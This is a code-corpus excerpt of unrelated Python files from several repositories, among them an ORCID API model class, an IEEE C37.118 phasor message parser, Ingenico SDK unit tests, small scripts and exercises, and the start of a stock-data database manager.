:type: ExternalIDsV30
"""
self._external_ids = external_ids
@property
def display_index(self):
"""Gets the display_index of this EducationSummaryV30. # noqa: E501
:return: The display_index of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._display_index
@display_index.setter
def display_index(self, display_index):
"""Sets the display_index of this EducationSummaryV30.
:param display_index: The display_index of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._display_index = display_index
@property
def visibility(self):
"""Gets the visibility of this EducationSummaryV30. # noqa: E501
:return: The visibility of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._visibility
@visibility.setter
def visibility(self, visibility):
"""Sets the visibility of this EducationSummaryV30.
:param visibility: The visibility of this EducationSummaryV30. # noqa: E501
:type: str
"""
allowed_values = ["LIMITED", "REGISTERED_ONLY", "PUBLIC", "PRIVATE"] # noqa: E501
if visibility not in allowed_values:
raise ValueError(
"Invalid value for `visibility` ({0}), must be one of {1}" # noqa: E501
.format(visibility, allowed_values)
)
self._visibility = visibility
@property
def path(self):
"""Gets the path of this EducationSummaryV30. # noqa: E501
:return: The path of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this EducationSummaryV30.
:param path: The path of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._path = path
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(EducationSummaryV30, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, EducationSummaryV30):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api_v3/models/education_summary_v30.py | Python | mit | 13,754 |
# Script Name : sqlite_check.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Runs checks to check my SQLITE database
import sqlite3 as lite
import sys
import os
dropbox = os.getenv("dropbox")
dbfile = ("Databases\jarvis.db")
master_db = os.path.join(dropbox, dbfile)
con = None
try:
con = lite.connect(master_db)
cur = con.cursor()
cur.execute('SELECT SQLITE_VERSION()')
data = cur.fetchone()
print
"SQLite version: %s" % data
except lite.Error, e:
print
"Error %s:" % e.args[0]
sys.exit(1)
finally:
if con:
con.close()
con = lite.connect(master_db)
cur = con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
rows = cur.fetchall()
for row in rows:
print
row
con = lite.connect(master_db)
cur = con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
while True:
row = cur.fetchone()
if row == None:
break
print
row[0]
| areriff/pythonlearncanvas | Python Script Sample/sqlite_check.py | Python | mit | 1,034 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import DetectedLanguage
from ._models_py3 import DocumentEntities
from ._models_py3 import DocumentError
from ._models_py3 import DocumentKeyPhrases
from ._models_py3 import DocumentLanguage
from ._models_py3 import DocumentLinkedEntities
from ._models_py3 import DocumentSentiment
from ._models_py3 import DocumentStatistics
from ._models_py3 import EntitiesResult
from ._models_py3 import Entity
from ._models_py3 import EntityLinkingResult
from ._models_py3 import ErrorResponse
from ._models_py3 import InnerError
from ._models_py3 import KeyPhraseResult
from ._models_py3 import LanguageBatchInput
from ._models_py3 import LanguageInput
from ._models_py3 import LanguageResult
from ._models_py3 import LinkedEntity
from ._models_py3 import Match
from ._models_py3 import MultiLanguageBatchInput
from ._models_py3 import MultiLanguageInput
from ._models_py3 import RequestStatistics
from ._models_py3 import SentenceSentiment
from ._models_py3 import SentimentConfidenceScorePerLabel
from ._models_py3 import SentimentResponse
from ._models_py3 import TextAnalyticsError
from ._models_py3 import TextAnalyticsWarning
except (SyntaxError, ImportError):
from ._models import DetectedLanguage # type: ignore
from ._models import DocumentEntities # type: ignore
from ._models import DocumentError # type: ignore
from ._models import DocumentKeyPhrases # type: ignore
from ._models import DocumentLanguage # type: ignore
from ._models import DocumentLinkedEntities # type: ignore
from ._models import DocumentSentiment # type: ignore
from ._models import DocumentStatistics # type: ignore
from ._models import EntitiesResult # type: ignore
from ._models import Entity # type: ignore
from ._models import EntityLinkingResult # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import InnerError # type: ignore
from ._models import KeyPhraseResult # type: ignore
from ._models import LanguageBatchInput # type: ignore
from ._models import LanguageInput # type: ignore
from ._models import LanguageResult # type: ignore
from ._models import LinkedEntity # type: ignore
from ._models import Match # type: ignore
from ._models import MultiLanguageBatchInput # type: ignore
from ._models import MultiLanguageInput # type: ignore
from ._models import RequestStatistics # type: ignore
from ._models import SentenceSentiment # type: ignore
from ._models import SentimentConfidenceScorePerLabel # type: ignore
from ._models import SentimentResponse # type: ignore
from ._models import TextAnalyticsError # type: ignore
from ._models import TextAnalyticsWarning # type: ignore
from ._text_analytics_client_enums import (
DocumentSentimentValue,
ErrorCodeValue,
InnerErrorCodeValue,
SentenceSentimentValue,
WarningCodeValue,
)
__all__ = [
'DetectedLanguage',
'DocumentEntities',
'DocumentError',
'DocumentKeyPhrases',
'DocumentLanguage',
'DocumentLinkedEntities',
'DocumentSentiment',
'DocumentStatistics',
'EntitiesResult',
'Entity',
'EntityLinkingResult',
'ErrorResponse',
'InnerError',
'KeyPhraseResult',
'LanguageBatchInput',
'LanguageInput',
'LanguageResult',
'LinkedEntity',
'Match',
'MultiLanguageBatchInput',
'MultiLanguageInput',
'RequestStatistics',
'SentenceSentiment',
'SentimentConfidenceScorePerLabel',
'SentimentResponse',
'TextAnalyticsError',
'TextAnalyticsWarning',
'DocumentSentimentValue',
'ErrorCodeValue',
'InnerErrorCodeValue',
'SentenceSentimentValue',
'WarningCodeValue',
]
| Azure/azure-sdk-for-python | sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/_generated/v3_0/models/__init__.py | Python | mit | 4,297 |
#Kunal Gautam
#Codewars : @Kunalpod
#Problem name: Mexican Wave
#Problem level: 6 kyu
def wave(str):
li=[]
for i in range(len(str)):
x=list(str)
x[i]=x[i].upper()
li.append(''.join(x))
return [x for x in li if x!=str]
| Kunalpod/codewars | mexican_wave.py | Python | mit | 255 |
# This is modified from a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
import array
import struct
import zlib
from enum import Enum
from pkg_resources import parse_version
from kaitaistruct import __version__ as ks_version, KaitaiStruct, KaitaiStream, BytesIO
if parse_version(ks_version) < parse_version('0.7'):
raise Exception(
"Incompatible Kaitai Struct Python API: 0.7 or later is required, but you have %s" % (ks_version))
from .cfg_2 import Cfg2
from .header import Header
from .data import Data
from .cfg_3 import Cfg3
from .command import Command
def _kaitai_repr(self):
_repr_list = []
for item in vars(self):
if not item.startswith('_'):
_r = getattr(self, item)
if type(_r) in (int, float, str, bytes, bool):
_repr_list.append("=".join((item, _r.__repr__())))
else:
_repr_list.append(item)
return "<" + self.__class__.__name__ + " |" + ", ".join(_repr_list) + ">"
def _enum_repr(self):
_repr_list = []
for item in ("name", "value"):
_r = getattr(self, item)
_repr_list.append("=".join((item, _r.__repr__())))
return "<" + self.__class__.__name__[:-4] + " |" + ", ".join(_repr_list) + ">"
def _kaitai_show(self, parent_path=' '):
if type(self) in (int, float, str, bytes, bool):
print(" == ".join((parent_path, self.__repr__())))
elif type(self) == list:
for i, item in enumerate(self):
try:
item.show('{}[{}]'.format(parent_path,i))
except:
_kaitai_show(item,'{}[{}]'.format(parent_path,i))
else:
for item in sorted(vars(self)):
if not item.startswith('_'):
_r = getattr(self, item)
try:
_r.show(parent_path+'.'+item)
except:
_kaitai_show(_r,parent_path+'.'+item)
def _enum_show(self, parent_path=' '):
for item in ("name", "value"):
_r = getattr(self, item)
print(parent_path+'.'+item+' == '+_r.__repr__())
KaitaiStruct.__repr__ = _kaitai_repr
Enum.__repr__ = _enum_repr
KaitaiStruct.show = _kaitai_show
Enum.show = _enum_show
#msg.show()
class PhasorMessage(KaitaiStruct):
def __repr__(self):
_repr_list = [
"time=" + str(self.time)] if self.fracsec.fraction_of_second else []
for item in vars(self):
if not item.startswith('_'):
_r = getattr(self, item)
if type(_r) in (int, float, str, bytes):
_repr_list.append("=".join((item, _r.__repr__())))
else:
_repr_list.append(item)
return "<" + self.__class__.__name__ + " |" + ", ".join(_repr_list) + ">"
def show(self, parent_path=' '):
if self.fracsec.fraction_of_second:
print(parent_path+'.time == '+str(self.time))
_kaitai_show(self, parent_path)
def __init__(self, _io, _parent=None, _root=None, _mini_cfgs=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._pkt_pos = self._io.pos()
self.sync = self._root.SyncWord(self._io, self, self._root)
self.framesize = self._io.read_u2be()
self.idcode = self._io.read_u2be()
self._mini_cfg = _mini_cfgs.mini_cfg[self.idcode]
self.soc = self._io.read_u4be()
self.fracsec = self._root.Fracsec(self._io, self, self._root,
self._mini_cfg.time_base.time_base if self._mini_cfg else None)
_on = self.sync.frame_type.value
if _on == 0:
if self._mini_cfg:
self.data = Data(self._io, _mini_cfg=self._mini_cfg)
else:
self.data = self._io.read_bytes((self.framesize - 16))
elif _on == 3:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Cfg2(io)
_mini_cfgs.add_cfg(self.idcode, self.data)
elif _on == 4:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Command(io)
elif _on == 5:
_mini_cfgs.add_cfg(self.raw_pkt)
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Cfg3(io)
elif _on == 2:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Cfg2(io)
elif _on == 1:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Header(io)
self.chk = self._io.read_u2be()
class SyncWord(KaitaiStruct):
class FrameTypeEnum(Enum):
data = 0
header = 1
cfg1 = 2
cfg2 = 3
cmd = 4
cfg3 = 5
class VersionNumberEnum(Enum):
c_37_118_2005 = 1
c_37_118_2_2011 = 2
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.magic = self._io.ensure_fixed_contents(struct.pack('1b', -86))
self.reserved = self._io.read_bits_int(1) != 0
self.frame_type = self._root.SyncWord.FrameTypeEnum(
self._io.read_bits_int(3))
self.version_number = self._root.SyncWord.VersionNumberEnum(
self._io.read_bits_int(4))
class Fracsec(KaitaiStruct):
def __repr__(self):
_repr_list = ["fraction_of_second=" +
str(self.fraction_of_second)] if self.fraction_of_second else []
for item in vars(self):
if not item.startswith('_'):
_r = getattr(self, item)
if type(_r) in (int, float, str):
_repr_list.append("=".join((item, _r.__repr__())))
else:
_repr_list.append(item)
return "<" + self.__class__.__name__ + " |" + ", ".join(_repr_list) + ">"
def show(self, parent_path):
if self.fraction_of_second:
print(parent_path+'.fraction_of_second == ' + str(self.fraction_of_second))
_kaitai_show(self, parent_path)
class LeapSecondDirectionEnum(Enum):
add = 0
delete = 1
class MsgTqEnum(Enum):
normal_operation_clock_locked_to_utc_traceable_source = 0
time_within_10_to_9_s_of_utc = 1
time_within_10_to_8_s_of_utc = 2
time_within_10_to_7_s_of_utc = 3
time_within_10_to_6_s_of_utc = 4
time_within_10_to_5_s_of_utc = 5
time_within_10_to_4_s_of_utc = 6
time_within_10_to_3_s_of_utc = 7
time_within_10_to_2_s_of_utc = 8
time_within_10_to_1_s_of_utc = 9
time_within_1_s_of_utc = 10
time_within_10_s_of_utc = 11
fault_clock_failure_time_not_reliable = 15
def __init__(self, _io, _parent=None, _root=None, _time_base=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._time_base = _time_base
self.reserved = self._io.read_bits_int(1) != 0
self.leap_second_direction = self._root.Fracsec.LeapSecondDirectionEnum(
self._io.read_bits_int(1))
self.leap_second_occurred = self._io.read_bits_int(1) != 0
self.leap_second_pending = self._io.read_bits_int(1) != 0
self.time_quality = self._root.Fracsec.MsgTqEnum(
self._io.read_bits_int(4))
self.raw_fraction_of_second = self._io.read_bits_int(24)
@property
def fraction_of_second(self):
if hasattr(self, '_m_fraction_of_second'):
return self._m_fraction_of_second if hasattr(self, '_m_fraction_of_second') else None
if self._time_base:
self._m_fraction_of_second = self.raw_fraction_of_second / self._time_base
return self._m_fraction_of_second if hasattr(self, '_m_fraction_of_second') else None
@property
def time(self):
if hasattr(self, '_m_time'):
return self._m_time if hasattr(self, '_m_time') else None
self._m_time = self.soc + self.fracsec.fraction_of_second
return self._m_time if hasattr(self, '_m_time') else None
@property
def chk_body(self):
if hasattr(self, '_m_chk_body'):
return self._m_chk_body if hasattr(self, '_m_chk_body') else None
_pos = self._io.pos()
self._io.seek(0)
self._m_chk_body = self._io.read_bytes((self.framesize - 2))
self._io.seek(_pos)
return self._m_chk_body if hasattr(self, '_m_chk_body') else None
@property
def raw_pkt(self):
if hasattr(self, '_m_pkt'):
return self._m_pkt if hasattr(self, '_m_pkt') else None
_pos = self._io.pos()
self._io.seek(self._pkt_pos)
self._m_pkt = self._io.read_bytes(self.framesize)
self._io.seek(_pos)
return self._m_pkt if hasattr(self, '_m_pkt') else None
| sonusz/PhasorToolBox | phasortoolbox/parser/common.py | Python | mit | 9,531 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This bot regenerates the page VEIDs
The following parameters are supported:
-debug If given, doesn't do any real changes, but only shows
what would have been changed.
"""
__version__ = '$Id: basic.py 4946 2008-01-29 14:58:25Z wikipedian $'
import wikipedia
import pagegenerators, catlib, re, socket, sys
from iplib import CIDR, IPv4Address
class IpNetworkBot:
def __init__(self, nets_generator, debug):
"""
Constructor. Parameters:
* generator - The page generator that determines on which pages
to work on.
* debug - If True, doesn't do any real changes, but only shows
what would have been changed.
"""
self.nets_generator = nets_generator
self.nets = dict()
self.debug = debug
def registerIpNet(self, page):
if ":" in page.title(): return
text = page.get()
in_ipnettpl = False
private = False
for line in text.split("\n"):
if line.startswith("{{IPNetwork"):
in_ipnettpl = True
continue
if line.startswith("}}"):
in_ipnettpl = False
continue
if in_ipnettpl:
if line.startswith("|PRIVATE=1"):
private = True
if not private:
print page.title()
def run(self):
print "# generated by netlist.py"
for page in self.nets_generator:
self.registerIpNet(page)
def main():
# The generator gives the pages that should be worked upon.
gen = None
# If debug is True, doesn't do any real changes, but only show
# what would have been changed.
debug = False
wantHelp = False
# Parse command line arguments
for arg in wikipedia.handleArgs():
if arg.startswith("-debug"):
debug = True
else:
wantHelp = True
if not wantHelp:
# The preloading generator is responsible for downloading multiple
# pages from the wiki simultaneously.
cat = catlib.Category(wikipedia.getSite(), 'Category:%s' % 'IP-Network')
nets_gen = pagegenerators.CategorizedPageGenerator(cat, start = None, recurse = False)
nets_gen = pagegenerators.PreloadingGenerator(nets_gen)
bot = IpNetworkBot(nets_gen, debug)
bot.run()
else:
wikipedia.showHelp()
if __name__ == "__main__":
try:
main()
finally:
wikipedia.stopme()
| sicekit/sicekit | robots/tool-list_networks.py | Python | mit | 2,437 |
def goodSegement1(badList,l,r):
sortedBadList = sorted(badList)
current =sortedBadList[0]
maxVal = 0
for i in range(len(sortedBadList)):
current = sortedBadList[i]
maxIndex = i+1
# first value
if i == 0 and l<=current<=r:
val = current - l
prev = l
print("first index value")
print("prev, current : ",prev,current)
if(val>maxVal):
maxVal = val
print("1. (s,e)",l,current)
# other middle values
elif l<=current<=r:
prev = sortedBadList[i-1]
val = current - prev
print("prev, current : ",prev,current)
if(val>maxVal):
maxVal = val
print("2. (s,e)",prev,current)
# last value
if maxIndex == len(sortedBadList) and l<=current<=r:
print("last index value")
next = r
val = next - current
if(val>maxVal):
maxVal = val
print("3. (s,e)",current,next)
print("maxVal:",maxVal-1)
pass
goodSegement1([2,5,8,10,3],1,12)
goodSegement1([37,7,22,15,49,60],3,48)
| nithincvpoyyil/nithincvpoyyil.github.io | test.py | Python | mit | 1,191 |
import sublime, sublime_plugin
from indenttxt import indentparser
class IndentToList(sublime_plugin.TextCommand):
def run(self, edit):
parser = indentparser.IndentTxtParser()
#Get current selection
sels = self.view.sel()
selsParsed = 0
if(len(sels) > 0):
for sel in sels:
#Make sure selection isn't just a cursor
if(abs(sel.b - sel.a) > 0):
self.parseRegion(parser, sel, edit)
selsParsed += 1
#All selections just cursor marks?
if(selsParsed == 0):
region = sublime.Region(0, self.view.size() - 1)
self.parseRegion(parser, region, edit)
def parseRegion(self, parser, region, edit):
lines = self.view.line(region)
text = self.view.substr(lines)
indented = parser.parseText(text)
newview = self.view.window().new_file()
newview.insert(edit, 0, indented)
| Harrison-M/indent.txt-sublime | indentsublime.py | Python | mit | 967 |
def Setup(Settings,DefaultModel):
# set1-test_of_models_against_datasets/osm299.py
Settings["experiment_name"] = "set1_Mix_model_versus_datasets_299px"
Settings["graph_histories"] = ['together'] #['all','together',[],[1,0],[0,0,0],[]]
# 5556x_minlen30_640px 5556x_minlen20_640px 5556x_reslen20_299px 5556x_reslen30_299px
n=0
Settings["models"][n]["dataset_name"] = "5556x_reslen30_299px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix_minlen30_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
Settings["models"].append(DefaultModel.copy())
n+=1
Settings["models"][n]["dataset_pointer"] = -1
Settings["models"][n]["dataset_name"] = "5556x_reslen20_299px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix_minlen20_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
Settings["models"].append(DefaultModel.copy())
n+=1
Settings["models"][n]["dataset_pointer"] = -1
Settings["models"][n]["dataset_name"] = "5556x_mark_res_299x299"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix_nosplit_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
return Settings
| previtus/MGR-Project-Code | Settings/set1-test_of_models_against_datasets/mix299.py | Python | mit | 1,829 |
# -*- coding: UTF-8 -*-
import base64
import unittest
from ingenico.connect.sdk.defaultimpl.default_marshaller import DefaultMarshaller
from ingenico.connect.sdk.domain.metadata.shopping_cart_extension import ShoppingCartExtension
from ingenico.connect.sdk.meta_data_provider import MetaDataProvider
from ingenico.connect.sdk.request_header import RequestHeader
class MetaDataProviderTest(unittest.TestCase):
"""Contains tests to check that the meta data provider correctly stores allowed request headers
and refuses prohibited headers
"""
def test_server_meta_data_headers_full(self):
"""Tests that the MetaDataProvider can construct meta_data_headers when supplied with a full shopping cart"""
shopping_cart_extension = ShoppingCartExtension("Ingenico.creator", "Extension", "1.0", "ExtensionId")
meta_data_provider = MetaDataProvider("Ingenico", shopping_cart_extension)
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(1, len(request_headers))
self.assertServerMetaInfo(meta_data_provider, "Ingenico", shopping_cart_extension, request_headers[0])
def test_server_meta_data_headers_full_no_shopping_cart_extension_id(self):
"""Tests that the MetaDataProvider can construct meta_data_headers when supplied with a full shopping cart"""
shopping_cart_extension = ShoppingCartExtension("Ingenico.creator", "Extension", "1.0")
meta_data_provider = MetaDataProvider("Ingenico", shopping_cart_extension)
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(1, len(request_headers))
self.assertServerMetaInfo(meta_data_provider, "Ingenico", shopping_cart_extension, request_headers[0])
def test_get_server_metadata_headers_no_additional_headers(self):
"""Tests that the MetaDataProvider functions correctly without any additional headers as arguments"""
meta_data_provider = MetaDataProvider("Ingenico")
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(1, len(request_headers))
self.assertServerMetaInfo(meta_data_provider, "Ingenico", None, request_headers[0])
def test_get_server_metadata_headers_additional_headers(self):
"""Tests that the MetaDataProvider can handle multiple additional headers"""
additional_headers = [RequestHeader("Header1", "&=$%"), RequestHeader("Header2", "blah blah"),
RequestHeader("Header3", "foo")]
meta_data_provider = MetaDataProvider("Ingenico", None, additional_headers)
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(4, len(request_headers))
for index in range(1, 4):
self.assertEqual(additional_headers[index-1].name, request_headers[index].name)
self.assertEqual(additional_headers[index-1].value, request_headers[index].value)
def test_constructor_with_prohibited_headers(self):
"""Tests that the MetaDataProvider constructor does not accept any headers marked as prohibited"""
for name in MetaDataProvider.prohibited_headers:
additional_headers = [RequestHeader("Header1", "Value1"),
RequestHeader(name, "should be slashed and burnt"),
RequestHeader("Header3", "Value3")]
with self.assertRaises(Exception) as error:
MetaDataProvider("Ingenico", None, additional_headers)
self.assertIn(name, str(error.exception))
def assertServerMetaInfo(self, meta_data_provider, integrator, shopping_cart_extension=None, request_header=None):
"""Assert that checks that the request_header is the default header "X-GCS-ServerMetaInfo",
that the server_meta_data_info of the meta_data_provider is correct
and that the shopping cart extension is consistent with the extension stored in meta_data_provider
"""
self.assertEqual("X-GCS-ServerMetaInfo", request_header.name)
self.assertIsNotNone(request_header.value)
# server_meta_info is stored in json format and encoded using utf-8 and base64 encoding, decode it
server_meta_info_json = base64.b64decode(request_header.value).decode('utf-8')
server_meta_info = DefaultMarshaller.INSTANCE().unmarshal(server_meta_info_json, MetaDataProvider.ServerMetaInfo)
self.assertEqual(meta_data_provider._platform_identifier, server_meta_info.platform_identifier)
self.assertEqual(meta_data_provider._sdk_identifier, server_meta_info.sdk_identifier)
self.assertEqual("Ingenico", server_meta_info.sdk_creator)
self.assertEqual(integrator, server_meta_info.integrator)
if shopping_cart_extension is None:
self.assertIsNone(server_meta_info.shopping_cart_extension)
else:
self.assertEqual(shopping_cart_extension.creator, server_meta_info.shopping_cart_extension.creator)
self.assertEqual(shopping_cart_extension.name, server_meta_info.shopping_cart_extension.name)
self.assertEqual(shopping_cart_extension.version, server_meta_info.shopping_cart_extension.version)
self.assertEqual(shopping_cart_extension.extension_id, server_meta_info.shopping_cart_extension.extension_id)
if __name__ == '__main__':
unittest.main()
| Ingenico-ePayments/connect-sdk-python3 | tests/unit/test_meta_data_provider.py | Python | mit | 5,371 |
# -*- coding: utf-8 -*-
import threading
import logging
import unittest
import gc
from stockviderApp.utils import retryLogger
from stockviderApp.sourceDA.symbols.referenceSymbolsDA import ReferenceSymbolsDA
from stockviderApp.localDA.symbols.dbReferenceSymbolsDA import DbReferenceSymbolsDA
from stockviderApp.sourceDA.symbols.googleSymbolsDA import GoogleSymbolsDA
from stockviderApp.sourceDA.symbols.yahooSymbolsDA import YahooSymbolsDA
from stockviderApp.sourceDA.symbols.wikiSymbolsDA import WikiSymbolsDA
from stockviderApp.localDA.symbols.dbGoogleSymbolsDA import DbGoogleSymbolsDA
from stockviderApp.localDA.symbols.dbYahooSymbolsDA import DbYahooSymbolsDA
from stockviderApp.localDA.symbols.dbWikiSymbolsDA import DbWikiSymbolsDA
from stockviderApp.localDA.rawData.dbGoogleRawDataDA import DbGoogleRawDataDA
from stockviderApp.localDA.rawData.dbYahooRawDataDA import DbYahooRawDataDA
from stockviderApp.localDA.rawData.dbWikiRawDataDA import DbWikiRawDataDA
from stockviderApp.sourceDA.rawData.googleRawDataDA import GoogleRawDataDA
from stockviderApp.sourceDA.rawData.yahooRawDataDA import YahooRawDataDA
from stockviderApp.sourceDA.rawData.wikiRawDataDA import WikiRawDataDA
from stockviderApp.sourceDA.rawData.referenceRawDataDA import ReferenceRawDataDA
from stockviderApp.localDA.rawData.dbReferenceRawDataDA import DbReferenceRawDataDA
class ThreadUpdateRawData(threading.Thread):
'''
Threading class handling data retrieval from Quand sources.
'''
threadLimiter = threading.BoundedSemaphore(3)
# De toute façon il y en a que 3 max
def __init__(self, _updateFunc, _symbolList, _exchange):
threading.Thread.__init__(self)
self.updateFunc = _updateFunc
self.symbolList = _symbolList
self.exchange = _exchange
# Récupère le logger
self.logger = logging.getLogger(__name__)
return
def run(self):
# Demande l'acquisition d'un thread
ThreadUpdateRawData.threadLimiter.acquire()
# Découpe la liste de symbols en plusieurs listes (pb de mémoire)
listOfSymbsList = ThreadUpdateRawData._chunks(self.symbolList, 100)
for (curIndex, currentSymbolsList) in enumerate(listOfSymbsList):
self.logger.info("Traitement de la liste " + str(curIndex + 1) +
"/" + str(len(listOfSymbsList)))
# Execute la fonction d'update
self.updateFunc(currentSymbolsList, self.exchange)
# Relache proprement la mémoire
gc.collect()
# Release le thread
ThreadUpdateRawData.threadLimiter.release()
return
@classmethod
def _chunks(cls, l, n):
'''
Chuncks and returns the list in multiple list of size n.
:param l: list to chunck
:type l: list
:param n: chunck size
:type n: int
:returns: list of chunked lists
:rtype: list
'''
listOfLists = []
for i in range(0, len(l), n):
listOfLists.append(l[i:i+n])
return listOfLists
class DbManager(object):
'''
Class wrapping all procedures to update the local database from
outside sources.
'''
# A virer en prod - utile en debug pour limiter la récupération de données
limitNbr = None # A none il n'est pas pris en compte
exchangeTuple = ('NYSE', 'NASDAQ')
instrumentType = 'EQUITIES'
def __init__(self):
# Récupère le logger
self.logger = logging.getLogger(__name__)
return
def runTest(self):
'''
Runs tests.
'''
self.logger.info("Début des tests unitaires")
self._runUnitTest()
self.logger.info("Fin des tests unitaires")
return
def runSymbols(self):
'''
Handles the symbol tables update in the database.
'''
self.logger.info("Début de l'update des symbols Quandl")
# Update les symbols des tables Quandl
self._updateQuandlSymbols(self.exchangeTuple)
self.logger.info("Fin de l'update des symbols Quandl")
self.logger.info("Début de l'update des symbols de référence")
# Upate les symbols de référence
for exchange in self.exchangeTuple:
self.logger.info("Référence - ajout des symbols de " + str(exchange))
self._updateReferenceSymbols(exchange, self.instrumentType)
self.logger.info("Fin de l'update des symbols de référence")
self.logger.info("Début du nettoyage des symbols de référence")
# Nettoie les doublons dans les symbols de ref entre Nyse et Nasdaq
self._cleanDuplicatedReferenceSymbols()
self.logger.info("Fin du nettoyage des symbols de référence")
self.logger.info("Début du mapping des symbols de référence")
# Mappe les symbols de référence
for exchange in self.exchangeTuple:
self.logger.info("Référence - mapping des symbols de " + str(exchange))
self._mapReferenceSymbols(exchange)
self.logger.info("Fin du mapping des symbols de référence")
return
def runQuandlRawData(self, exchange):
'''
Handle the Quandl data update in the database.
'''
self.logger.info("Début de traitement des raw data Quandl de " + str(exchange))
self._updateQuandlRawData(exchange)
return
def runReferenceRawData(self, exchange):
'''
Handle the aggregated data update in the database.
'''
self.logger.info("Début de traitement des raw data Reference de " + str(exchange))
self._updateReferenceRawData(exchange)
return
# -------------------------------------------------------------
def _runUnitTest(self):
'''
Runs unit tests.
'''
# Lance les tests
testsuite = unittest.TestLoader().discover('./test/')
testResults = unittest.TextTestRunner(verbosity=1).run(testsuite)
# Log les erreurs et les echec
self.logger.warning("Erreur de test : ")
for errorString in testResults.errors:
self.logger.error(errorString)
for failureString in testResults.failures:
self.logger.error(failureString)
return
# ------------------ Méthodes d'update des symbols -------------------
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateReferenceSymbols(self, exchange, instrumentType):
'''
Updates the reference symbol table in the database.
:param exchange: name of the exchange
:type exchange: str
:param instrumentType: type of instrument (EQUITIES, BOND, ...)
:type instrumentType: str
.. warning::
This procedure must be called after the local update of the Quandl
symbols.
'''
# Met en place le DAO des symbols de référence
referenceSymbolsDAO = ReferenceSymbolsDA(exchange)
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
# Récupère les symbols de référence
referenceSymbolsList = referenceSymbolsDAO.returnSymbolsList(instrumentType)[0:DbManager.limitNbr]
# Les ajoute en DB
dbReferenceSymbolDAO.updateOrAddSymbolsList(referenceSymbolsList, exchange)
self.logger.info("Référence - symbols ajoutés dans la table")
return
def _cleanDuplicatedReferenceSymbols(self):
'''
Cleans the reference symbol table from duplicated entries.
.. note::
It may happen that the same symbol is listed on both NYSE and
NASDAQ. This procedure ensures that these symbols are only recorded
once in the database.
'''
# Met en place le DAO local des symbols de référence
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
dbReferenceSymbolDAO.cleanDuplicatedSymbols('NYSE', 'NASDAQ')
self.logger.info("Référence - NYSE/NASDAQ nettoyés")
return
def _mapReferenceSymbols(self, exchange):
'''
Maps the 1-1 relation of reference symbols object with each Quandl
symbols.
:param exchange: name of the exchange
:type exchange: str
'''
# Met en place le DAO des symbols de référence
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
# Récupère tous les symbols de l'exchange
referenceSymbolsList = dbReferenceSymbolDAO.getAllSymbolsList(exchange)
